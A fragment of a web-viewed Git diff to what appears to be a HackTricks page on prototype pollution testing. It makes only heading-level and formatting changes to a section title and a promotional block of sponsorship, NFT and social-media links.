@ -262,7 +293,7 @@ function debugAccess(obj, prop, debugGet=true){
|
|||
debugAccess(Object.prototype, 'ppmap')
|
||||
```
|
||||
|
||||
# Automatic Browser Access to test payloads
|
||||
## Automatic Browser Access to test payloads
|
||||
|
||||
```javascript
|
||||
//Taken from https://github.com/svennergr/writeups/blob/master/inti/0621/README.md
|
||||
|
@ -304,21 +335,14 @@ async function sleep(ms) {
|
|||
})();
|
||||
```
|
||||
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong><a href="https://www.twitch.tv/hacktricks_live/schedule">🎙️ HackTricks LIVE Twitch</a> Wednesdays 5.30pm (UTC) 🎙️ - <a href="https://www.youtube.com/@hacktricks_LIVE">🎥 Youtube 🎥</a></strong></summary>
|
||||
<summary><a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ HackTricks LIVE Twitch</strong></a> <strong>Wednesdays 5.30pm (UTC) 🎙️ -</strong> <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
|
||||
|
||||
- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
|
||||
- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
|
||||
- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
|
||||
- **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
|
||||
|
||||
- **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
|
||||
* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
|
||||
* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
|
||||
|
||||
</details>
|
||||
|
||||
|
||||
|
|
Loading…
Reference in a new issue